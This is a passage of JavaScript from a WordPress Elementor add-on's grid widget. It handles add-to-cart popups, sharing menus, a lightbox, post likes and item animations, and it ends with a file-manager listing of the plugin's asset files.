                                        removeAnimationClass = "king-addons-added-to-cart-skew-off";
                                        break;
                                    case "fade":
                                        animationClass = "king-addons-added-to-cart-fade";
                                        removeAnimationClass = "king-addons-added-to-cart-fade-out";
                                        break;
                                }
                                if (!$scope.find(`#king-addons-added-to-cart-${productId}`).length) {
                                    $scope
                                        .find(".king-addons-grid")
                                        .append(
                                            `<div id="king-addons-added-to-cart-${productId}" class="king-addons-added-to-cart-popup ${animationClass}">
                          ${popupImage}
                          <div class="king-addons-added-tc-title">
                            <p>${popupText} ${KingAddonsGridData.addedToCartText}</p>
                            <p><a href="${popupLink}">${KingAddonsGridData.viewCart}</a></p>
                          </div>
                        </div>`
                                        );
                                    setTimeout(() => {
                                        $scope
                                            .find(`#king-addons-added-to-cart-${productId}`)
                                            .addClass(removeAnimationClass);
                                        setTimeout(() => {
                                            $scope.find(`#king-addons-added-to-cart-${productId}`).remove();
                                        }, animTime * 1000);
                                    }, fadeOutIn * 1000);
                                }
                            }
                        }

                        // Setup post sharing behavior.
                        function postSharing() {
                            if (!$scope.find(".king-addons-sharing-trigger").length) return;
                            const $sharingTrigger = $scope.find(".king-addons-sharing-trigger");
                            const $sharingInner = $scope.find(".king-addons-post-sharing-inner");
                            let sharingWidth = 5;
                            $sharingInner.first().find("a").each(function () {
                                sharingWidth += $(this).outerWidth() + parseInt($(this).css("margin-right"), 10);
                            });
                            const direction = $sharingTrigger.attr("data-direction");
                            if (direction === "left" || direction === "right") {
                                $sharingInner.css("width", `${sharingWidth}px`);
                                if (direction === "left") {
                                    $sharingInner.css(
                                        "left",
                                        -(parseInt($sharingInner.find("a").css("margin-right"), 10) + sharingWidth) + "px"
                                    );
                                } else {
                                    $sharingInner.css({left: $sharingTrigger.css("margin-right")});
                                }
                            } else if (direction === "top") {
                                const margin = parseInt($sharingInner.find("a").css("margin-right"), 10);
                                $sharingInner.find("a").css({"margin-right": "0", "margin-top": `${margin}px`});
                                $sharingInner.css({
                                    top: `-${margin}px`,
                                    left: "50%",
                                    transform: "translate(-50%, -100%)",
                                });
                            } else if (direction === "bottom") {
                                const margin = parseInt($sharingInner.find("a").css("margin-right"), 10);
                                $sharingInner.find("a").css({"margin-right": "0", "margin-bottom": `${margin}px`});
                                $sharingInner.css({
                                    bottom: `-${margin}px`,
                                    left: "50%",
                                    transform: "translate(-50%, 100%)",
                                });
                            }
                            if ($sharingTrigger.attr("data-action") === "click") {
                                $sharingTrigger.on("click", function () {
                                    const $inner = $(this).next();
                                    if ($inner.css("visibility") === "hidden") {
                                        $inner.css("visibility", "visible").find("a").css({opacity: "1", top: "0"});
                                        setTimeout(() => $inner.find("a").addClass("king-addons-no-transition-delay"), $inner.find("a").length * 100);
                                    } else {
                                        $inner.find("a").removeClass("king-addons-no-transition-delay").css({
                                            opacity: "0",
                                            top: "-5px",
                                        });
                                        setTimeout(() => $inner.css("visibility", "hidden"), $inner.find("a").length * 100);
                                    }
                                });
                            } else {
                                $sharingTrigger.on("mouseenter", function () {
                                    const $inner = $(this).next();
                                    $inner.css("visibility", "visible").find("a").css({opacity: "1", top: "0"});
                                    setTimeout(() => $inner.find("a").addClass("king-addons-no-transition-delay"), $inner.find("a").length * 100);
                                });
                                $scope.find(".king-addons-grid-item-sharing").on("mouseleave", function () {
                                    const $inner = $(this).find(".king-addons-post-sharing-inner");
                                    $inner.find("a").removeClass("king-addons-no-transition-delay").css({
                                        opacity: "0",
                                        top: "-5px",
                                    });
                                    setTimeout(() => $inner.css("visibility", "hidden"), $inner.find("a").length * 100);
                                });
                            }
                        }

                        // Setup media hover behavior and overlay clickable links.
                        function mediaHoverLink() {
                            const $wrap = $grid.find(".king-addons-grid-image-wrap");
                            if ($wrap.data("img-on-hover") === "yes") {
                                $grid.find(".king-addons-grid-media-wrap").hover(
                                    function () {
                                        const $secondImg = $(this).find("img:nth-of-type(2)");
                                        if ($secondImg.attr("src")) {
                                            $(this).find("img:first-of-type").addClass("king-addons-hidden-img");
                                            $secondImg.removeClass("king-addons-hidden-img");
                                        }
                                    },
                                    function () {
                                        const $secondImg = $(this).find("img:nth-of-type(2)");
                                        if ($secondImg.attr("src")) {
                                            $secondImg.addClass("king-addons-hidden-img");
                                            $(this).find("img:first-of-type").removeClass("king-addons-hidden-img");
                                        }
                                    }
                                );
                            }
                            if ($wrap.attr("data-overlay-link") === "yes" && !isEditor) {
                                $wrap.css("cursor", "pointer").on("click", function (e) {
                                    const cn = e.target.className;
                                    if (
                                        cn.indexOf("inner-block") !== -1 ||
                                        cn.indexOf("king-addons-cv-inner") !== -1 ||
                                        cn.indexOf("king-addons-grid-media-hover") !== -1
                                    ) {
                                        e.preventDefault();
                                        let itemUrl = $(this)
                                            .find(".king-addons-grid-media-hover-bg")
                                            .attr("data-url")
                                            .replace("#new_tab", "");
                                        if ($grid.find(".king-addons-grid-item-title a").attr("target") === "_blank") {
                                            window.open(itemUrl, "_blank").focus();
                                        } else {
                                            window.location.href = itemUrl;
                                        }
                                    }
                                });
                            }
                        }

                        function lightboxPopup(settings) {
                            // If there are no .king-addons-grid-item-lightbox elements, exit early
                            if (!$scope.find('.king-addons-grid-item-lightbox').length) return;

                            const lightboxElements = $scope.find('.king-addons-grid-item-lightbox');
                            const firstOverlay = lightboxElements.find('.king-addons-grid-lightbox-overlay').first();

                            // Assign data-src and data-iframe for items not marked with .lg-initialized
                            lightboxElements.each(function () {
                                const el = jQuery(this);
                                const srcAttr = el.find('.inner-block > span').attr('data-src');
                                const article = el.closest('article').not('.slick-cloned');

                                // If not in Elementor editor mode, add data-src
                                if (!isEditor) {
                                    article.find('.king-addons-grid-image-wrap').attr('data-src', srcAttr);
                                }

                                // Check if it should be an iframe (not hosted in wp-content)
                                const finalSrc = article.find('.king-addons-grid-image-wrap').attr('data-src');
                                if (finalSrc && finalSrc.indexOf('wp-content') === -1) {
                                    article.find('.king-addons-grid-image-wrap').attr('data-iframe', 'true');
                                }

                                // Mark article as initialized
                                article.addClass('lg-initialized');
                            });

                            // Initialize or re-initialize lightGallery
                            if (!$grid.data('lightGallery')) {
                                $grid.lightGallery(settings.lightbox);
                            } else {
                                $grid.data('lightGallery').destroy(true);
                                $grid.lightGallery(settings.lightbox);
                            }

                            // Rewrite thumbnails only once after opening the lightbox
                            let thumbsRewritten = false;
                            $grid.on('onAfterOpen.lg', function () {
                                if (thumbsRewritten) return;
                                thumbsRewritten = true;

                                jQuery('.lg-outer').find('.lg-thumb-item').each(function () {
                                    const img = jQuery(this).find('img');
                                    const original = img.attr('src');
                                    const extIndex = original.lastIndexOf('.');
                                    const dashIndex = original.lastIndexOf('-');
                                    const dashChunk = original.substring(dashIndex, extIndex);

                                    // If it looks like a typical WordPress crop (e.g., -150x150), replace it
                                    if (/\d{3,}x\d{3,}/.test(dashChunk)) {
                                        img.attr('src', original.replace(dashChunk, '-150x150'));
                                    } else {
                                        // Otherwise, just insert -150x150 before the extension
                                        img.attr('src', [
                                            original.slice(0, extIndex),
                                            '-150x150',
                                            original.slice(extIndex)
                                        ].join(''));
                                    }
                                });
                            });

                            // Toggle certain controls on slide events
                            $scope.find('.king-addons-grid').on('onAfterAppendSlide.lg onAfterSlide.lg', function () {
                                const controls = jQuery('#lg-actual-size, #lg-zoom-in, #lg-zoom-out, #lg-download');
                                const dl = jQuery('#lg-download');
                                const dlHref = dl.attr('href');

                                // Hide or show controls based on file location
                                if (dl.length) {
                                    if (dlHref.indexOf('wp-content') === -1) {
                                        controls.addClass('king-addons-hidden-element');
                                    } else {
                                        controls.removeClass('king-addons-hidden-element');
                                    }
                                }

                                // If autoplay is disabled, hide the autoplay button
                                if (settings.lightbox.autoplay === '') {
                                    jQuery('.lg-autoplay-button').css({
                                        width: 0,
                                        height: 0,
                                        overflow: 'hidden'
                                    });
                                }
                            });

                            // If overlay exists, move it and set click handler
                            if (firstOverlay.length) {
                                $scope.find('.king-addons-grid-media-hover-bg').after(firstOverlay.remove());
                                $scope.find('.king-addons-grid-lightbox-overlay').on('click', function () {
                                    if (!isEditor) {
                                        jQuery(this).closest('article').find('.king-addons-grid-image-wrap').trigger('click');
                                    } else {
                                        alert('Lightbox is Disabled in the Editor! Please Preview this Page to see it in action.');
                                    }
                                });
                            } else {
                                // Otherwise, set click on .inner-block > span
                                lightboxElements.find('.inner-block > span').on('click', function () {
                                    if (!isEditor) {
                                        jQuery(this).closest('article').find('.king-addons-grid-image-wrap').trigger('click');
                                    } else {
                                        alert('Lightbox is Disabled in the Editor! Please Preview this Page to see it in action.');
                                    }
                                });
                            }
                        }


                        // Handle post likes.
                        function postLikes() {
                            if (!$scope.find(".king-addons-post-like-button").length) return;
                            $scope.on("click", ".king-addons-post-like-button", function (e) {
                                e.preventDefault();
                                const $btn = $(this);
                                if (!$btn.attr("data-post-id")) return false;
                                $.ajax({
                                    type: "POST",
                                    url: $btn.attr("data-ajax"),
                                    data: {
                                        action: "king_addons_likes_init",
                                        post_id: $btn.attr("data-post-id"),
                                        nonce: $btn.attr("data-nonce"),
                                    },
                                    beforeSend: () => $btn.fadeTo(500, 0.5),
                                    success: function (response) {
                                        let iconClass = $btn.attr("data-icon");
                                        let countHTML = response.count;
                                        if (!countHTML.replace(/<\/?[^>]+(>|$)/g, "")) {
                                            countHTML = `<span class="king-addons-post-like-count">${$btn.attr("data-text")}</span>`;
                                            $btn.addClass("king-addons-likes-zero");
                                        } else {
                                            $btn.removeClass("king-addons-likes-zero");
                                        }
                                        if ($btn.hasClass("king-addons-already-liked")) {
                                            $btn.prop("title", "Like").removeClass("king-addons-already-liked");
                                            $btn.html(`<i class="${iconClass.replace("fas", "far")}"></i>${countHTML}`);
                                        } else {
                                            $btn.prop("title", "Unlike").addClass("king-addons-already-liked");
                                            $btn.html(`<i class="${iconClass.replace("far", "fas")}"></i>${countHTML}`);
                                        }
                                        $btn.fadeTo(500, 1);
                                    },
                                });
                                return false;
                            });
                        }

                        // Animate grid items after layout.
                        function animateGridItems(filteredItems, s, $grid) {
                            let initStager = 0,
                                filterStager = 0,
                                deepLinkStager = 0;
                            if (!$grid.hasClass("grid-images-loaded")) $grid.css("opacity", "1");
                            filteredItems.forEach((item) => {
                                initStager += s.animation_delay;
                                $(item.element)
                                    .find(".king-addons-grid-item-inner")
                                    .css({
                                        opacity: "1",
                                        top: "0",
                                        transform: "scale(1)",
                                        transition: `all ${s.animation_duration}s ease-in ${initStager}s`,
                                    });
                                filterStager += s.filters_animation_delay;
                                if ($grid.hasClass("grid-images-loaded")) {
                                    $(item.element)
                                        .find(".king-addons-grid-item-inner")
                                        .css({
                                            transition: `all ${s.filters_animation_duration}s ease-in ${filterStager}s`,
                                        });
                                }
                                let deepLink = window.location.hash;
                                if (deepLink.includes("#filter:") && !deepLink.includes("#filter:*")) {
                                    deepLink = deepLink.replace("#filter:", "");
                                    if ($(item.element).hasClass(deepLink)) {
                                        deepLinkStager += s.filters_animation_delay;
                                        $(item.element)
                                            .find(".king-addons-grid-item-inner")
                                            .css({"transition-delay": `${deepLinkStager}s`});
                                    }
                                }
                            });
                        }
                    },
                }),
                {$element: $scope}
            );
        }

        gridHooks.forEach((hook) => {
            elementorFrontend.hooks.addAction(hook, gridHandler);
        });

    });
})(jQuery);

Filemanager

Name Type Size Permission Actions
grid.css File 47.44 KB 0640
grid.js File 84.89 KB 0640
icon-loading.png File 11.92 KB 0640
media.js File 74.6 KB 0640
prev.js File 76.2 KB 0640
woocommerce.js File 72.5 KB 0640
Filemanager